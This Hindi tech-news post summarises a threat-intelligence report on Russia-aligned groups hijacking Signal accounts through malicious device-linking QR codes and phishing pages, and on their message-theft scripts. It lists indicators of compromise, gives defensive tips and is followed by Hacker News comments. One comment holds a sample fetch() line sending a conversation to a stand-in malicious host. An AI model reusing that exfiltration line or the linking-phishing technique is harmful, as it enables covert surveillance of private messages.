1 पॉइंट द्वारा GN⁺ 2025-02-20 | 2 टिप्पणियां | WhatsApp पर शेयर करें
  • रूस की खुफिया एजेंसियों की रुचि वाले लोगों द्वारा उपयोग किए जाने वाले Signal अकाउंट्स को केंद्रित रूप से निशाना बनाया जा रहा है, और संवेदनशील सरकारी व सैन्य संचार तक पहुँचने के लिए अकाउंट समझौता करने के प्रयास बढ़ रहे हैं
  • सबसे व्यापक रूप से इस्तेमाल की गई तकनीक वैध Linked Devices फीचर का दुरुपयोग करना है, जिसमें पीड़ित से एक दुर्भावनापूर्ण QR कोड स्कैन करवाया जाता है और फिर संदेशों को हमलावर के डिवाइस पर रीयल-टाइम में सिंक किया जाता है
  • UNC5792 नकली Signal group invite, UNC4221 Kropyva-थीम वाले phishing kit और नकली security alert, तथा APT44 कब्ज़े में लिए गए डिवाइसों तक पहुँच के ज़रिये device linking को निशाना बनाते हैं
  • APT44, Turla, और Belarus-संबद्ध UNC1151 जैसे समूह Android और Windows वातावरण में Signal database या Signal Desktop संदेशों व attachments की चोरी की क्षमता भी चलाते हैं
  • यह समस्या केवल Signal तक सीमित नहीं है; WhatsApp और Telegram भी इसी तरह निशाने पर हैं, इसलिए app updates, linked devices की जाँच, QR code से सावधानी, और मजबूत screen lock आवश्यक हैं

Signal अकाउंट्स को निशाना बनाने वाली रूस-संबद्ध गतिविधियाँ

  • Google Threat Intelligence Group(GTIG) ने पुष्टि की है कि कई रूस-राज्य-संबद्ध threat actors Signal Messenger अकाउंट्स से समझौता करने के प्रयास बढ़ा रहे हैं
  • मुख्य लक्ष्य वे व्यक्ति हैं जो रूस की खुफिया एजेंसियों की रुचि के दायरे में आते हैं, और यूक्रेन पर दोबारा आक्रमण के बाद संवेदनशील सरकारी व सैन्य संचार तक पहुँचने की युद्धकालीन मांग ने इन गतिविधियों को बढ़ाया है
  • Signal सैनिकों, राजनेताओं, पत्रकारों, कार्यकर्ताओं और उच्च-जोखिम समुदायों द्वारा उपयोग किया जाने वाला एक secure messenger है, इसलिए यह निगरानी और खुफिया अभियानों के लिए high-value target बन गया है
  • इसी तरह के खतरे WhatsApp और Telegram जैसे अन्य लोकप्रिय messengers तक भी फैल रहे हैं, और रूस-संबद्ध समूह समान तकनीकों का उपयोग कर रहे हैं
  • Signal की नवीनतम Android और iOS releases में ऐसे hardening features शामिल हैं जो समान phishing campaigns के खिलाफ बचाव में मदद करते हैं
    • इन सुविधाओं का उपयोग करने के लिए users को नवीनतम version में update करना होगा

Linked Devices फीचर का दुरुपयोग कैसे किया जाता है

  • सबसे नई और सबसे व्यापक तकनीक Signal के वैध linked devices फीचर का दुरुपयोग है
  • Signal कई devices पर एक साथ उपयोग के लिए नया device link करते समय सामान्यतः QR code scan करने की मांग करता है
  • threat actors ऐसे malicious QR codes बनाते हैं जिन्हें स्कैन करने पर हमलावर-नियंत्रित Signal instance पीड़ित के अकाउंट से लिंक हो जाता है
  • लिंक सफल होने पर आगे के संदेश पीड़ित और हमलावर दोनों तक रीयल-टाइम में सिंक होते रहते हैं, जिससे पूरे device compromise के बिना भी secure conversations पर निगरानी जारी रखी जा सकती है
  • remote phishing में malicious QR codes आमतौर पर इस रूप में छिपाए जाते हैं
    • Signal group invite
    • security alert
    • Signal वेबसाइट पर वैध device pairing instructions
  • अधिक अनुकूलित remote phishing में malicious device-linking QR code ऐसे phishing page में डाला जाता है जो यूक्रेनी सेना द्वारा उपयोग किए जाने वाले विशेष applications जैसा दिखता है
  • यही तरीका proximity access operations में भी उपयोग होता है
    • APT44 युद्धक्षेत्र में तैनात रूसी सेना द्वारा कब्ज़े में लिए गए devices के Signal अकाउंट्स को हमलावर-नियंत्रित infrastructure से लिंक करता है ताकि आगे दुरुपयोग किया जा सके
  • newly linked devices के माध्यम से होने वाला अकाउंट compromise अक्सर low-signal initial access बन जाता है क्योंकि इसके लिए centralized technical detection और defense सीमित हैं
    • सफल होने पर यह compromise लंबे समय तक बिना ध्यान में आए बना रह सकता है

UNC5792: बदले गए Signal group invites

  • UNC5792 एक ऐसा cluster है जिस पर रूस-संबद्ध जासूसी गतिविधि का संदेह है, और यह CERT-UA के UAC-0195 से आंशिक रूप से ओवरलैप करता है
  • यह समूह Signal के वैध group invite page में छेड़छाड़ कर उसे phishing campaign में उपयोग करता है
  • सामान्य flow में user को Signal group की ओर redirect किया जाता है, लेकिन tampered page पीड़ित के Signal अकाउंट से हमलावर-नियंत्रित device को लिंक करने वाले malicious URL पर भेजता है
  • attacker-controlled infrastructure को इस तरह बनाया जाता है कि वह वैध Signal group invite जैसा दिखे
  • नकली group invite का JavaScript सामान्य Signal group join redirection की जगह sgnl://linkdevice?uuid= फ़ॉर्मेट वाले Signal new device-linking URI को शामिल करने वाले malicious block से बदल दिया जाता है
  • उदाहरण domain के रूप में signal-groups[.]tech देखा गया है

UNC4221: कस्टम Signal phishing kit

  • UNC4221 एक रूस-संबद्ध threat actor है जिसे CERT-UA UAC-0185 के रूप में ट्रैक करता है, और यह यूक्रेनी सैनिकों द्वारा उपयोग किए जाने वाले Signal अकाउंट्स को सक्रिय रूप से निशाना बनाता है
  • यह समूह Kropyva application के components जैसा दिखने वाला एक कस्टम Signal phishing kit चलाता है, जिसका उपयोग यूक्रेनी सेना तोपखाना मार्गदर्शन के लिए करती है
  • UNC4221 भी UNC5792 की तरह trusted contact से आए Signal group invite के रूप में device linking feature को छिपाता है
  • देखे गए phishing kit variants कई रूपों में हैं
    • phishing websites जो पीड़ित को दूसरे phishing infrastructure पर redirect करती हैं, जो Signal द्वारा दिए गए वैध device-linking instructions जैसा दिखता है
    • websites जिनमें base Kropyva-themed phishing kit के भीतर सीधे malicious device-linking QR code डाला गया है
    • 2022 के शुरुआती operations में ऐसे phishing pages जो वैध Signal security alerts जैसे दिखते थे
  • उदाहरण domains और pages में signal-confirm[.]site, teneta.add-group[.]site, signal-protect[.]host आदि शामिल हैं
  • UNC4221 Signal targeting के एक मुख्य component के रूप में PINPOINT नामक lightweight JavaScript payload भी उपयोग करता है
    • PINPOINT browser के GeoLocation API का उपयोग करके बुनियादी user information और location data एकत्र करता है
  • भविष्य में समान operations में secure messages और location data दोनों को साथ निशाना बनाया जा सकता है
    • खासकर targeted surveillance operations या conventional military operations के समर्थन के संदर्भ में दोनों प्रकार के data पर एक साथ हमला हो सकता है

Signal संदेश चोरी के लिए रूस और Belarus-संबद्ध गतिविधियाँ

  • कई ज्ञात regional threat actors पीड़ित के अकाउंट से अतिरिक्त device link करने के अलावा Android और Windows devices से Signal database files चुराने की क्षमताएँ भी चला रहे हैं
  • APT44 WAVESIGN नामक lightweight Windows Batch script का उपयोग करता है
    • यह पीड़ित के Signal database से समय-समय पर Signal messages को query करता है
    • हालिया messages को Rclone के माध्यम से exfiltrate करता है
  • 2023 में यूक्रेन की Security Service of Ukraine(SSU) और ब्रिटेन के National Cyber Security Centre(NCSC) द्वारा रिपोर्ट किया गया Infamous Chisel Android malware Sandworm को attributed है
    • इसे Android devices पर Signal सहित कई messenger apps के local databases और अन्य file extensions की सूची को recursively खोजने के लिए डिज़ाइन किया गया है
  • Turla रूस का एक threat actor है जिसे Russian FSB Center 16 से attributed किया गया है
    • post-compromise यह Windows environment में Signal Desktop messages को exfiltration के लिए तैयार करने वाली lightweight PowerShell scripts चलाता है
  • Belarus-संबद्ध UNC1151 Robocopy command-line utility का उपयोग करता है
    • यह Signal Desktop द्वारा messages और attachments को store करने वाली file directories की सामग्री को बाद में exfiltration के लिए stage करता है

Secure messenger उपयोगकर्ताओं के लिए बचाव उपाय

  • कई threat actors द्वारा Signal पर यह केंद्रित ध्यान दिखाता है कि secure messenger applications के खिलाफ खतरे निकट भविष्य में और गंभीर हो सकते हैं
  • commercial spyware industry की वृद्धि और conflict zones में उपयोग होने वाले mobile malware variants में बढ़ोतरी के साथ संवेदनशील संचार की निगरानी करने वाली आक्रामक cyber capabilities की मांग बढ़ रही है
  • खतरा सिर्फ phishing और malware delivery जैसी remote cyber operations तक सीमित नहीं है
    • proximity access operations भी एक बड़ा जोखिम हैं, जिनमें हमलावर को target के unlocked device तक थोड़े समय के लिए पहुँच मिल जाती है
  • केवल Signal ही नहीं, बल्कि WhatsApp और Telegram भी कई रूस-संबद्ध समूहों की हालिया target priority list में शामिल हैं
    • Microsoft Threat Intelligence ने हाल की blog post में COLDRIVER, UNC4057, और Star Blizzard द्वारा WhatsApp अकाउंट compromise के लिए Linked Devices फीचर के दुरुपयोग की कोशिश वाले campaign पर चर्चा की है
  • जिन users को state-backed intrusion activity का target बनाया जा सकता है, उन्हें निम्नलिखित defensive habits अपनानी चाहिए
    • सभी mobile devices पर screen lock सक्रिय करें और uppercase, lowercase, numbers, और symbols के मिश्रण वाला लंबा व जटिल password उपयोग करें
    • Android alphanumeric passwords को support करता है, और यह numeric PIN या pattern की तुलना में काफी अधिक security देता है
    • operating system updates को यथाशीघ्र install करें और Signal तथा अन्य messenger apps को हमेशा latest version पर रखें
    • Google Play Protect चालू रखें, जो Google Play Services वाले Android devices पर default रूप से enabled होता है
    • app settings के “Linked devices” सेक्शन में नियमित रूप से जाँच करें कि कोई unauthorized device तो नहीं है
    • ऐसे QR codes और web resources से सावधान रहें जो software update, group invite, या अन्य alerts जैसे दिखें और तुरंत कार्रवाई के लिए कहें
    • जहाँ संभव हो, fingerprint, face recognition, security key, या one-time codes जैसे 2-factor authentication का उपयोग करें ताकि account login या new device linking को verify किया जा सके
    • जिन iPhone users को targeted surveillance या espionage का खतरा हो, वे attack surface घटाने के लिए Lockdown Mode सक्षम करने पर विचार करें

Indicators of compromise और देखी गई तकनीकों का सार

  • संगठन की hunting और identification में मदद के लिए registered users हेतु GTI Collection में indicators of compromise शामिल किए गए हैं
  • संबंधित indicators of compromise के उदाहरण इस प्रकार हैं
    • UNC5792: e078778b62796bab2d7ab2b04d6b01bf, बदले गए group invite HTML code का उदाहरण
    • UNC5792 नकली group invite phishing pages: add-signal-group[.]com, add-signal-groups[.]com, group-signal[.]com, groups-signal[.]site, signal-device-off[.]online, signal-group-add[.]com, signal-group[.]site, signal-group[.]tech, signal-groups-add[.]com, signal-groups[.]site, signal-groups[.]tech, signal-security[.]online, signal-security[.]site, signalgroup[.]site, signals-group[.]com
    • UNC4221 device-linking instruction phishing pages: signal-confirm[.]site, confirm-signal[.]site
    • UNC4221 नकली Signal security alert: signal-protect[.]host
    • UNC4221 नकली Kropyva group invites: teneta.join-group[.]online, teneta.add-group[.]site, group-teneta[.]online, helperanalytics[.]ru, teneta[.]group, group.kropyva[.]site
    • APT44: 150.107.31[.]194:18000, APT44 द्वारा उपलब्ध कराया गया dynamically generated device-linking QR code
    • APT44 WAVESIGN Batch scripts: a97a28276e4f88134561d938f60db495, b379d8f583112cad3cf60f95ab3a67fd, b27ff24870d93d651ee1d8e06276fa98
  • प्रत्येक observed threat actor के tactics और techniques इस प्रकार हैं
    • UNC5792: नकली group invites का उपयोग करने वाली remote phishing के माध्यम से पीड़ित के Signal messages को attacker-controlled device से pair करना
    • UNC4221: नकली military web applications और security alerts का उपयोग करने वाली remote phishing के माध्यम से पीड़ित के Signal messages को attacker-controlled device से pair करना
    • APT44: physical access वाले devices का दुरुपयोग कर पीड़ित के Signal messages को attacker-controlled device से pair करना
    • APT44: Android malware Infamous Chisel के ज़रिये Signal database files की exfiltration का प्रयास करना
    • APT44: Windows Batch scripts के माध्यम से हालिया Signal messages को Rclone द्वारा समय-समय पर exfiltrate करना
    • Turla: Windows environment compromise के बाद Signal Desktop database theft activity चलाना
    • UNC1151: Robocopy के माध्यम से Signal Desktop file directories को exfiltration के लिए तैयार करना

2 टिप्पणियां

 
ndrgrd 2025-02-20

कमज़ोर होना अपनी जगह सच है, लेकिन group chats को ढंग से encrypt भी न करने वाले Telegram का security के मामले में आलोचना करना अपने-आप में ही हास्यास्पद है।

 
GN⁺ 2025-02-20
Hacker News की राय
  • Signal जैसे linked device workflow वाले ऐप्स काफी समय से जोखिम भरे रहे हैं
    पिछले साल जब Telegram ने Signal को नीचा दिखाया था, तब भी इस बात की ओर इशारा किया गया था(https://news.ycombinator.com/context?id=40303736), और मेरा मानना है कि Signal का linked device implementation लंबे समय से समस्याग्रस्त रहा है: https://eprint.iacr.org/2021/626.pdf
    असल हमले के मामलों को सार्वजनिक साहित्य में आने में इतना लंबा समय लगना उल्टा हैरान करने वाला है। Signal ने इस हमले को अपने threat model के बाहर माना, इससे भी मदद नहीं मिली। उस पेपर के मुताबिक, Signal को 20 अक्टूबर 2020 को रिपोर्ट मिली और 28 अक्टूबर को जवाब देते हुए उसने कहा कि वह long-term secret key compromise को adversary model में शामिल नहीं करता

    • अगर मैंने सही पढ़ा है, तो यह हमला मानता है कि attacker के पास पहले से ही यूज़र के डिवाइस पर ही stored private key (IK) और यूज़र password है
      तो फिर पीड़ित के किसी एक device तक physical access या कोई दूसरा backdoor होना चाहिए, और उस स्तर पर तो क्या आप पहले ही हार नहीं चुके हैं? अगर मैं गलत हूं तो कृपया सुधारें। physical hardware security और phishing prevention अब भी मुख्य लगते हैं
    • उस पेपर का attack मानता है कि Signal protocol की अन्य keys derive करने के लिए इस्तेमाल होने वाली यूज़र की long-term private identity key (IK) पहले ही चोरी हो चुकी है
      lab के बाहर उसे पाने का तरीका आम तौर पर यूज़र के device पर root access हासिल करना, या हालिया chat backup चुराना ही होता है। Google ने जो campaign पाया वह phishing के करीब है, इसलिए technically कम गंभीर है, लेकिन यूज़र को यह कैसे चेतावनी दी जाए कि वह risky action कर रहा है—यह पूरी usability security से जुड़ी मुश्किल समस्या है। जब नया linked device जोड़ते समय message history और पिछले 45 दिनों के attachments तक copy होने लगेंगे, तो Signal में यह मुद्दा और अहम हो जाएगा
    • सोच रहा हूं कि अगर linked device feature इस्तेमाल न किया जाए, तो क्या यह attack surface भी कम हो जाता है
  • आजकल मुझे और ज़्यादा महसूस होता है कि end-to-end encryption में आखिरकार क्लाइंट को अंतिम यूज़र द्वारा खुद build और verify किया जा सकना चाहिए
    मैं encrypted CRDT-आधारित encrypted AI chat service बना रहा हूँ, और rendering side में fetch की एक line या कोई analytics tracker डाल देने भर से protocol द्वारा वादा की गई security बेकार हो जाती है। इससे आगे, जिस operating system पर rendering चलती है, उस पर भी भरोसा करना पड़ता है
    क्लाइंट को open source बनाकर reproducible तरीके से build करने लायक बना दें, तब भी उसे iOS Store के ज़रिए distribute करना पड़ता है, और publishing process में कुछ भी हो सकता है। iOS को उदाहरण इसलिए लिया क्योंकि self-built app upload करना वहाँ खास तौर पर मुश्किल है। अगर multi-party chat हो, तो दूसरी तरफ़ वालों को भी वही process अपनानी होगी
    तमाम शानदार protocols और सबसे अच्छे transport-layer encryption का इस्तेमाल करें, फिर भी अंत में सब कुछ trust का सवाल है। Signal जैसी चीज़ इस्तेमाल करने पर चिंता होती है कि कहीं पूरी तरह सुरक्षित environment के भ्रम में हम उलटे surveillance target तो नहीं बन जाते। अगर कोई government agency निगरानी करना चाहे, तो वह शायद उन Signal users पर resources लगाएगी जिनके पास छिपाने को सबसे ज़्यादा है
    कभी-कभी encrypted storage के अलावा सब कुछ बेमानी लगता है। यह भी अजीब है कि ज़्यादातर चर्चा maths-केंद्रित security protocol validity तक ही सीमित रहती है। rendering layer में fetch("[https://malvevolentactor.com](<https://malvevolentactor.com>;)", {body: JSON.stringify(convo)}) की एक line से सब bypass हो सकता है; इस पर लोगों की राय जानना चाहूँगा

    • आखिरकार CPU silicon बनने वाली रेत से लेकर operating system और packet delivery method तक पूरी pipeline को control नहीं कर सकते, तो कहीं न कहीं root of trust रखना ही पड़ेगा
      trust को खत्म करना असंभव लगता है; हम बस यह बदलते हैं कि किस पर भरोसा करना है, या उसे abstraction के पीछे छिपा देते हैं। आगे जो चीज़ और महत्वपूर्ण होगी, वह ऐसे mechanisms हैं जो साफ़ तौर पर साबित करें कि किसी हद तक trusted actor maliciously behave कर रहा है, और उसे accountable बनाएं
      उदाहरण के लिए, man-in-the-middle attack रोकने वाले certificate transparency logs, यह verify करने वाले reproducible builds कि मिला हुआ binary public open source code से match करता है या नहीं, और WhatsApp/Signal/iMessage में NSA key नहीं बल्कि expected public key मिल रही है या नहीं यह confirm करने वाली key transparency जैसी चीज़ें
    • encryption methods की theoretical status को लेकर बढ़ती obsession और अलग-अलग outcomes के वास्तविक risks को पीछे धकेलने में ऐसा लगता है जैसे गाड़ी घोड़े के आगे लग गई हो
      बहुत ज़्यादा सुरक्षित बनने की कोशिश करने वाला system users को अपने ही messages पढ़ने से रोक सकता है, और अंततः उन्हें कम सुरक्षित system की ओर धकेल सकता है। Matrix में भी logout करने पर messages हमेशा के लिए छूट सकते हैं, यह client साफ़ तौर पर बताने में नाकाम रहा, जिससे समस्या हुई
      perfect forward secrecy जैसी कुछ strong requirements practical तौर पर users messaging से जो चाहते हैं, उससे टकरा सकती हैं। user चाहता है कि “मेरे messages मैं कभी भी देख सकूँ, और कोई दूसरा कभी न देख सके”, लेकिन यह बहुत मुश्किल है। security, password reset और phone loss recovery के बीच बुनियादी tension है
      अगर लोग संभावित परिणामों को पूरी तरह समझें, तो काफी लोग शायद सबसे मजबूत end-to-end encryption न चाहें। इसके बजाय वे “अगर कोई और मेरे messages देखे तो उसे उम्रकैद” जैसी मजबूत legal guarantees चाह सकते हैं। कुछ लोग highest-level technical security चाहते हैं, लेकिन उस priority के हिसाब से design करने पर उन users के लिए उल्टा असर हो सकता है जो उस trade-off को स्वीकार नहीं करते
    • end-to-end encryption और client-server encryption के फर्क की चिंता करने लायक सचमुच secure चीज़ को iOS और Google Play Services के ऊपर बनाना मुझे काफी बेमानी लगता है
      जो लोग उस स्तर की security की चिंता करते हैं, वे iPhone के अलावा कुछ और इस्तेमाल करने की कोशिश करेंगे। Signal समर्थकों का उन cryptosystem users को LARPer कहना, जिन्हें वे पसंद नहीं करते, typical projection जैसा लगता है। अमेरिकी government में काम करने जैसे मामलों को छोड़ दें, तो मुझे साफ़ नहीं है कि Signal असल में किस threat model के लिए सही fit है
      academic crypto researchers का mathematical algorithms पर focus करने वाला streetlight effect भी साफ़ तौर पर मौजूद है। आजकल security research funding का दायरा थोड़ा बढ़ा है और end-to-end messaging protocols के toy models तक शामिल हो गया है, लेकिन असल में महत्वपूर्ण human-to-human पूरे segment को cover करने के लिए यह अभी भी पर्याप्त नहीं है
    • आप जो कह रहे हैं, उसके एक हिस्से को attestation भी कहा जाता है
      मूल रूप से कोई trusted root sign करता है, जिससे बिना शक यह confirm हो सके कि जिससे interaction हो रहा है वह किस phone+operating system+app से आया है
      Android में यह है; उदाहरण के लिए, यह किसी third party को confirm कर सकता है कि locked bootloader, Google signature और Google operating system चल रहे हैं या नहीं। सिद्धांत रूप में किसी दूसरे trust chain के साथ Google phone+Lineage OS जैसे “original” software को remote counterpart से accept करवाना भी संभव है
      app भी operating system द्वारा accessible app signature को verify करके, ज़रूरत पड़ने पर remote counterpart को दे सकता है। Google जैसे single actor पर अंधा भरोसा न करने वाला पूरी तरह transparent attestation artifact, signature trust root के बजाय, verify किए जाने वाले components के hashes और binaries वाला ledger इस्तेमाल कर सकता है
      ये सब technically possible है, लेकिन आज वास्तव में उपलब्ध तरीके से implement नहीं किया गया है। अगर पर्याप्त interest हुआ, तो मुझे लगता है कि अंततः implement हो जाएगा
    • आपने जो problems उठाई हैं, वे निश्चित रूप से मौजूद हैं, लेकिन लगता है कि हम 10–15 साल पहले communication की हालत भूल रहे हैं
      तब कुछ भी encrypted नहीं था, public Wi‑Fi पर कुछ करना Russian roulette जैसा था, और signals intelligence agencies का स्वर्ण युग चल रहा था। उस समय network encryption की priority ज़्यादा ऊँची थी
  • article में साफ़-साफ़ नहीं लिखा है, लेकिन मेरी समझ के अनुसार attacks में से एक का पहला step मारे गए सैनिक का smartphone हासिल करना है

    • article में कहा गया है कि वे malicious QR code बनाकर victim से Signal में attacker device link करवाते हैं
      सफल होने पर आगे के messages victim और attacker दोनों को real time में साथ-साथ deliver होते हैं
    • गंभीर बात करें तो यह soldiers के लिए smartphone को standard equipment बनाने की problem उठाता है
      लेकिन smartphone हर soldier को बिना अलग training के भी इस्तेमाल हो सकने वाला powerful computing और communication platform देता है। समस्या यह है कि ऊपर वाले comment के risks समेत इसे सुरक्षित कैसे बनाया जाए
      लगता है कोई न कोई ऐसा तरीका research कर रहा होगा जिससे इसे Russian intelligence agencies द्वारा भी effectively exploit न किया जा सके, इतना पर्याप्त protect किया जा सके। अगर ऐसे solutions व्यापक रूप से फैलें, तो वे civilian privacy पर भी अच्छे से लागू हो सकते हैं। Ukrainian civilians के phones को Russian attackers से protect करना भी बुरा idea नहीं है
    • soldiers को mobile phone carry करने की अनुमति नहीं होती
  • अगर बात सिर्फ एक बार QR code स्कैन करने से device link हो जाने की है, तो मुझे लगता है कि यही खामी है
    सिर्फ code स्कैन करके device link नहीं होना चाहिए; “हाँ, मैं इस device से link करना चाहता/चाहती हूँ” जैसी manual confirmation होनी चाहिए। तब अगर किसी ने इसे group invite code समझकर स्कैन किया हो, तो भी उसे पता चल सकता है कि असल में यह वह नहीं है। बेशक, फिर भी user को ध्यान देना होगा, लेकिन “group join code समझकर स्कैन किया और चुपचाप कोई दूसरा device link हो गया” की तुलना में यह meaningful सुधार है

    • याद रखना चाहिए कि Signal non-technical users के लिए design किया गया है
      कई users QR code, link, connection जैसी चीज़ों को समझते नहीं और उन पर गहराई से सोचते भी नहीं। वे तुरंत, instinct से अनुमान लगाकर tap करते हैं, और अक्सर screen से हटाकर अपने काम पर लौटने के लिए click करते हैं। मुझे नहीं पता कि यह मानने का आधार है या नहीं कि confirmation process नहीं है; शायद Signal docs देखकर पता चल जाए
  • संबंधित article: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
    इसे https://news.ycombinator.com/item?id=43103692 के जरिए देखा, लेकिन वहाँ comments नहीं हैं

  • अच्छी खबर यह है कि targeted होने की कोई वजह है। इसका मतलब है कि Signal अभी भी effective है

  • कई आवाज़ें कह रही हैं कि Signal compromise हो गया है, लेकिन लगभग हर case में यह देखना चाहिए कि उनकी open-source प्रकृति Signal से कम है
    Signal web-scale company बनते हुए भी human rights बचाने की पूरी कोशिश कर रहा है। व्यक्ति की गरिमा महत्वपूर्ण है। यह कोई साधारण बातचीत नहीं है

    • “किसने” compromise किया, यह confusing है। रूस ने या अमेरिकी intelligence agencies ने, पता नहीं
      Signal Foundation website पर board members को थोड़ी देर देखा, तो Council on Foreign Relations, World Economic Forum Young Global Leader, Truman National Security Project security fellow, U.S. Department of State की Foreign Affairs Policy Board जैसे phrases दिखे
      ये लोग intelligence दुनिया का हिस्सा जैसे लगते हैं। open-source messaging app Signal के board में ये ठीक-ठीक क्या कर रहे हैं, यह जानने की उत्सुकता है। मैं इस बात से सहमत हूँ कि यह साधारण बातचीत नहीं है
    • Telegram खासकर और खराब है। वह अपना encryption और अपना protocol इस्तेमाल करता है, default रूप से end-to-end encryption बिलकुल नहीं देता, और सब कुछ server पर plaintext में store करता है
    • कुल मिलाकर यह misinformation से भरा tricky environment है, और Signal जैसी valuable target के लिए तो खासकर
      अगर Signal secure है, तो privacy पर हमला करने वाले चाहेंगे कि लोग Signal को compromised मानें और कुछ और इस्तेमाल करें। अगर यह secure नहीं है, तो उल्टा वे चाहेंगे कि लोग Signal को secure मानें
      मेरे हिसाब से समाधान यह है कि संभावित misinformation sources, खासकर social media के random users, को पूरी तरह ignore किया जाए। HN भी शामिल है। जब social center ऐसी जगहों पर हो तो यह मुश्किल है, और खुद को इससे अलग करना पड़ता है। legitimate और भरोसेमंद voices तक सीमित रहना चाहिए
    • मुझे नहीं पता था कि अब भी कोई “web scale” शब्द को seriously इस्तेमाल करता है
      “MongoDB web scale है। बस on कीजिए और यह तुरंत scale हो जाता है”
  • settings menu में unexpected linked devices हैं या नहीं, यह check किया जा सकता है

    • सोच रहा/रही हूँ कि क्या Signal को linked devices हमेशा सीधे user interface में दिखाने चाहिए
      “3 active linked devices” जैसा छोटा icon दिखा देने जैसा
    • अच्छा idea है। मैं QR code भेजता/भेजती हूँ
  • कुछ domains दिए गए थे, लेकिन सभी registered नहीं हैं
    उदाहरण के लिए signal-protect[.]host और kropyva[.]site available हैं, और signal-confirm[.]site Ukraine में registered है। कुछ Russia में registered हैं
    युद्ध में शामिल देश पर, किसी भी side का हो, भरोसा नहीं करना चाहिए। A, B को दोष देता है और B, A को, लेकिन दोनों sides का अपना agenda होता है

    • signal-confirm[.]site Ukraine में registered है, फिर भी WHOIS data अक्सर fake होता है, इसलिए उसे आधार बनाना मुश्किल है
      Russia ऐसे कामों में Ukraine सहित पड़ोसी देशों के hijacked credentials या SIM cards भी इस्तेमाल करने के लिए जाना जाता है
    • malicious actor का domain Ukraine में registered है, इसका मतलब अपने-आप यह नहीं है कि वह Ukraine के हित में काम कर रहा है या Ukrainian authorities को इसकी जानकारी है
      दुर्भाग्य से Russian state actors को Ukraine के अंदर operate करने में भी समस्या नहीं होती। इसमें पैसे देने वाले के पीछे चलने वाले chaotic criminals, और Russia द्वारा temporarily occupied क्षेत्रों व Ukraine के बीच रोज़ आवाजाही करने वाले लोगों को जोड़ दें, तो मामला जल्दी ही जटिल हो जाता है
    • unregistered domains भी, उदाहरण के लिए अगर payload analysis में मिले हों, तो indicators of compromise हो सकते हैं